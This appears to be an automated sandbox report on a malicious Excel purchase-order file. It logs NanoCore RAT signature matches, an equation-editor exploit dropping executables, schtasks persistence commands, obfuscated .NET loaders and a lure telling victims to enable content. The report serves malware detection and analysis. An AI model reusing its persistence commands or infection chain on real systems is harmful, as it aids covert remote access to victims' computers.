        Source: 8.2.vbc.exe.520000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Screenshot number: 4Screenshot OCR: Enable Editing from the , , yellow bar above 20 ' This document is 21 3. Once you have enabled
        Source: Screenshot number: 4Screenshot OCR: Enable Content from the yellow bar above 23 24 25 26 27 28 0 29 . 30 31 32 33 34 35 3
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B19C24_2_002B19C2
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B1CB04_2_002B1CB0
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B3D284_2_002B3D28
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B9D804_2_002B9D80
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B1F684_2_002B1F68
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B9D704_2_002B9D70
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B3F704_2_002B3F70
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B1F584_2_002B1F58
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001EC0F08_2_001EC0F0
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001E43A08_2_001E43A0
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001EB4D88_2_001EB4D8
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001E37888_2_001E3788
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001EC1AE8_2_001EC1AE
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001EC9C88_2_001EC9C8
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001E44588_2_001E4458
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F19C29_2_003F19C2
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F1CB09_2_003F1CB0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F3D289_2_003F3D28
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F9D809_2_003F9D80
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F1F689_2_003F1F68
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F9D709_2_003F9D70
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F3F809_2_003F3F80
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_003F43A012_2_003F43A0
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_003F378812_2_003F3788
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 12_2_003F445812_2_003F4458
        Source: PO-FRE590164.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
        Source: Vbb[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: vbc.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: TrXHdHpWh.exe.4.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: smtpsvc.exe.8.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.vbc.exe.520000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.vbc.exe.520000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
        Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@15/11@2/3
        Source: C:\Users\Public\vbc.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PO-FRE590164.xlsxJump to behavior
        Source: C:\Users\Public\vbc.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{b4dbb526-0da4-4453-8602-b00f5f7a8285}
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMutant created: \Sessions\1\BaseNamedObjects\dbtwNmbxuXxomvAczU
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8B7.tmpJump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.............|.................................................................................$.....Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ...................... .........E.R.R.O.R.:. ...................T......................................................................... .....Jump to behavior
        Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ...................... .........E.R.R.O.(.P.....................T.......................................................j.......h......... .....Jump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: PO-FRE590164.xlsxVirustotal: Detection: 34%
        Source: PO-FRE590164.xlsxReversingLabs: Detection: 23%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'
        Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: unknownProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
        Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp'
        Source: unknownProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'Jump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
        Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp'Jump to behavior
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to behavior
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
        Source: PO-FRE590164.xlsxStatic file information: File size 2277376 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
        Source: PO-FRE590164.xlsxInitial sample: OLE indicators vbamacros = False
        Source: PO-FRE590164.xlsxInitial sample: OLE indicators encrypted = True

        Data Obfuscation:

        barindex
        .NET source code contains potential unpackerShow sources
        Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\Public\vbc.exeCode function: 4_2_002B879B push ecx; retf 4_2_002B879C
        Source: C:\Users\Public\vbc.exeCode function: 8_2_001EC990 push eax; iretd 8_2_001EC991
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F8572 pushad ; retf 9_2_003F8587
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeCode function: 9_2_003F879B push ecx; retf 9_2_003F879C
        Source: initial sampleStatic PE information: section name: .text entropy: 7.47933743717
        Source: initial sampleStatic PE information: section name: .text entropy: 7.47933743717
        Source: initial sampleStatic PE information: section name: .text entropy: 7.47933743717
        Source: initial sampleStatic PE information: section name: .text entropy: 7.47933743717
        Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 8.2.vbc.exe.400000.1.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\TrXHdHpWh.exeJump to dropped file
